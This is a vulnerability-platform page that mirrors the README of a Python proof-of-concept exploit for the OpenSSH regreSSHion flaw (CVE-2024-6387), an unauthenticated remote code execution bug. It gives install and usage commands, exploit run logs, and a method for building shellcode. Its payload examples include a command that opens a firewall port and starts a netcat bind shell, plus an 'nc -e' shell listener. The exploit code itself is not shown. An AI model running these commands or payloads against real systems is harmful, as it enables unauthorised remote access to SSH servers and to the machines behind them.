漏洞平台

POC详情： 422d1408c75a4c58e88972e14c5b88c59e4635da

来源

https://github.com/l-urk/CVE-2024-6387-L

关联漏洞

标题： OpenSSH 安全漏洞 (CVE-2024-6387)
描述：OpenSSH（OpenBSD Secure Shell）是加拿大OpenBSD计划组的一套用于安全访问远程计算机的连接工具。该工具是SSH协议的开源实现，支持对所有的传输进行加密，可有效阻止窃听、连接劫持以及其他网络级的攻击。 OpenSSH 存在安全漏洞，该漏洞源于信号处理程序中存在竞争条件，攻击者利用该漏洞可以在无需认证的情况下远程执行任意代码并获得系统控制权。

描述

Proof of concept python script for regreSSHion exploit. Version 0.1.0.

介绍

# CVE-2024-6387
*Proof of concept python script for regreSSHion exploit. Version 0.1.0*
![regreSSHion-1024x576](https://github.com/user-attachments/assets/99cec864-b32d-409a-8fc4-1f9615686024)
# Installation
```
cd ~
git clone https://github.com/l-urk/CVE-2024-6387-L.git
cd CVE-2024-6387-L
pip3 install -r requirements.txt
python3 regreSSHion.py -h
```
# Usage
```
🔒 CVE-2024-6387 regreSSHion remote code execution vulnerability exploit script

usage: regreSSHion.py [-h] -i IP -p PORT [-s SHELLCODE] [-d] [-z]

🔒 CVE-2024-6387 regreSSHion remote code execution vulnerability exploit script

options:
  -h, --help                           show this help message and exit
  -i IP, --ip IP                       target SSH server IPv4 addr - 172.0.0.1 (format: -i 0.0.0.0)
  -p PORT, --port PORT                 target SSH server port nmbr - mostly 22 (format: -p 00)
  -s SHELLCODE, --shellcode SHELLCODE  shellcode payload in hex - add byte (b) (format: -s b"\x00\x00\x00")
  -d, --debug                          enable debug mode - more verbose output (format: -d)
  -z, --hack                           enable hack mode skipping SSH handshake (format: -z)

🔒

🔒 Affected OpenSSH Versions: 1.2.2p1 ~ 4.4 and 8.5p1 ~ 9.8

🔒 contact: github.com/l-urk - x.com/l_urkk
```
To use the script, start python3 with regreSSHion.py
-  Set the ip to the vulnerable SSH server IPv4 address
-  Set the port to the vulnerable SSH server port number
```
python3 regreSSHion.py --ip 127.0.0.1 --port 22
```
```
2024-08-03 22:42:55,944 - INFOS - Attempting to connect to 127.0.0.1:22 (attempt 1)
2024-08-03 22:42:55,945 - INFOS - Connection established
2024-08-03 22:42:55,945 - INFOS - Performing SSH handshake...
2024-08-03 22:43:05,014 - INFOS - Received KEX_INIT (5 bytes)
2024-08-03 22:43:05,015 - INFOS - SSH handshake successful.
2024-08-03 22:43:05,015 - INFOS - Preparing heap...
2024-08-03 22:43:05,015 - INFOS - Sent tcache chunk 1
2024-08-03 22:43:05,015 - INFOS - Sent tcache chunk 2
2024-08-03 22:43:05,015 - INFOS - Sent tcache chunk 3
2024-08-03 22:43:05,015 - INFOS - Sent tcache chunk 4
```
Let's say you make it all the way here in the script...
```
2024-08-03 22:46:45,858 - INFOS - Sent fake file structure 3
2024-08-03 22:46:45,858 - INFOS - Sent fake file structure 4
2024-08-03 22:46:45,858 - INFOS - Sent fake file structure 5
2024-08-03 22:46:45,858 - INFOS - Sent large string
2024-08-03 22:46:45,858 - INFOS - Heap preparation complete.
2024-08-03 22:47:05,879 - INFOS - Estimated parsing time: 0.000056 seconds
2024-08-03 22:47:05,880 - INFOS - Final packet sent successfully.
2024-08-03 22:47:05,880 - INFOS - Verifying exploit success.
2024-08-03 22:47:15,890 - WARN! - No response received for verification.
```
If it says exploit verification success you have successfully delivered and executed your payload.
The script will try a few times to succeed.
I would suggest trying this on your own vulnerable SSH server until you get a feel for getting the success message.
```
2024-08-03 22:47:15,891 - ERROR - Exploitation failed.
```

Debug mode
-  With debug mode enabled you will get a more verbose output, this will show you the received SSH version string, packet length information, and some other things, pretty much everything that's happening that could possibly be logged.
```
python3 regreSSHion.py --ip 127.0.0.1 --port 22 --debug
```
Example Output:
```
2024-08-03 22:44:53,962 - DEBUG - Logging is set to DEBUG level
2024-08-03 22:44:53,962 - INFOS - Attempting to connect to 127.0.0.1:22 (attempt 1)
2024-08-03 22:44:53,963 - INFOS - Connection established
2024-08-03 22:44:53,963 - INFOS - Performing SSH handshake...
2024-08-03 22:44:53,963 - DEBUG - Sent SSH version string.
2024-08-03 22:44:53,963 - DEBUG - Waiting to receive SSH version string
2024-08-03 22:45:03,256 - DEBUG - Received SSH version string: SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1
2024-08-03 22:45:04,373 - INFOS - Received KEX_INIT (4 bytes)
2024-08-03 22:45:04,373 - INFOS - SSH handshake successful.
2024-08-03 22:45:04,373 - INFOS - Preparing heap...
```

# shellcode payload creation
You can make your own shellcode payload by using an ascii to hex editor, and manually converting it to shellcode. I use this ascii-to-hex website here: https://www.rapidtables.com/convert/number/ascii-to-hex.html
- Input your desired text for the shellcode. 
- Use the settings "User defined" and "\x" in the input box.
- Replace all capital X's with lowecase x's
- Use notepad or another character replacement capable program.
-  Move the last \x from the end to the start of the hex string.
-  Add quotes to both ends for interpretation by the shell.

# shellcode payload examples
hello world
```
hello world
```
```
"\x68\x65\x6C\x6C\x6F\x20\x77\x6F\x72\x6C\x64"
```
printf hello world
```
printf hello world
```
```
"\x70\x72\x69\x6E\x74\x66\x20\x68\x65\x6C\x6C\x6F\x20\x77\x6F\x72\x6C\x64"
```
make test file
```
test > test
```
```
"\x74\x65\x73\x74\x20\x3E\x20\x74\x65\x73\x74"
```
Allow incoming connections on port 9999 & open a nc shell on port 9999
```
ufw allow 9999 && /usr/bin/nc -lvp 9999 -e /usr/bin/sh
```
```
"\x75\x66\x77\x20\x61\x6C\x6C\x6F\x77\x20\x39\x39\x39\x39\x20\x26\x26\x20\x2F\x75\x73\x72\x2F\x62\x69\x6E\x2F\x6E\x63\x20\x2D\x6C\x76\x70\x20\x39\x39\x39\x39\x20\x2D\x65\x20\x2F\x75\x73\x72\x2F\x62\x69\x6E\x2F\x73\x68"
```

# send_socket.py
If you want to test out the exection of a shellcode payload you can use the send_socket.py script. 
Usage:
```
usage: send_socket.py [-h] [-i IP] [-p PORT] [-s SHELLCODE]

send shellcode to a target socket (ip and port)

options:
  -h, --help            show this help message and exit
  -i IP, --ip IP        target ip address (default: 127.0.0.1)
  -p PORT, --port PORT  target tcp socket port (default: 1111)
  -s SHELLCODE, --shellcode SHELLCODE
                        shellcode hex to send in format: \x00\x00\x00\...etc (default: F13)
```
**Sender:**
```
python3 send_socket.py -i 127.0.0.1 -p 1111
```
**Listener:**
-  raw text interpretation
```
nc -lvp 1111
```
-  shell execution
```
nc -lvp 1111 -e /usr/bin/bash
```

文件快照


 [4.0K]  /data/pocs/422d1408c75a4c58e88972e14c5b88c59e4635da
├── [1.2K]  LICENSE
├── [6.0K]  README.md
├── [ 18K]  regreSSHion.py
├── [   9]  requirements.txt
└── [1.4K]  send_socket.py

0 directories, 5 files

神龙机器人已为您缓存

备注

1. 建议优先通过来源进行访问。

2. 如果因为来源失效或无法访问，请发送邮箱到 f.jinxu#gmail.com 索取本地快照（把 # 换成 @）。

3. 神龙已为您对POC代码进行快照，为了长期维护，请考虑为本地POC付费，感谢您的支持。